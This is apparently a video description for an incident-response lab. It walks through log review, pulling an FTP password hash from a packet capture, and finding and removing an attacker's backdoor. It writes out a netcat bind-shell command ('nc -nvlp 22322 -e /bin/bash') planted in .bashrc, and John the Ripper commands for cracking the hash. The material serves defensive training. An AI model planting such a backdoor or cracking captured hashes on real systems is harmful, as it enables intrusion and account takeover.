Project 65 - Investigating A Cyber Attack In Progress!

Описание: Steps Taken/Commands Used (in the order that they appear in the video):

1. Open a browser and go to http://hdmovies.ca

2. Open a terminal and sudo cat /var/log/apache2/access.log.1 (to check the web traffic is the Apache access log)

3. If we look through the log entries, we can see either the downloading of movies or web resources, except for one entry which appears to be the downloading for a file called "dailytraffic.pcapng" (a packet capturing file) from IP address 172.20.0.7

4. wget http://hdmovies.ca/dailytraffic.pcapng (to download the file to my home directory)

5. sudo wireshark dailytraffic.pcapng (to open the packet capturing file in Wireshark)

6. ftp-data (to isolate packets belonging just to the data channel of this FTP session)

7. Right click the first packet and follow the TCP stream to see the plaintext username (admin) and a password hash

8. Click the "Save as" button at the bottom and name the file "leaked_hash.txt"

9. Open a new terminal and john leaked_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt (to try to crack the password hash)

10. john -show leaked_hash.txt (to display the cracked password)

11. service --status-all (to check all running services for potential entry points)

12. Let's look to see if any SSH session have been made: cat /var/log/lastlog (to display latest established connections)

13. It looks like our same friend at 172.20.07 who download the pcap file is the same one who successfully established a SSH connection to an internal host of ours

14. ps -aux (to display all running processes to see if there are any suspicious ones that may indicate a backdoor to the host)

15. It looks like we have a NetCat listener setup to listen on port 22322 and executes /bin/bash (allow the attacker to interact with a bash session on our end)

16. ack 'nc -nvlp 22322 -e /bin/bash' (to use ack to look through all the system files to find which script or process is initiating NetCat)

17. nano .bashrc (to read the file and remove the "nc" command)

18. Save and Exit

19. kill 2201 (to kill the current process in use)

20. sudo netstat -tulpn (to verify that it is gone)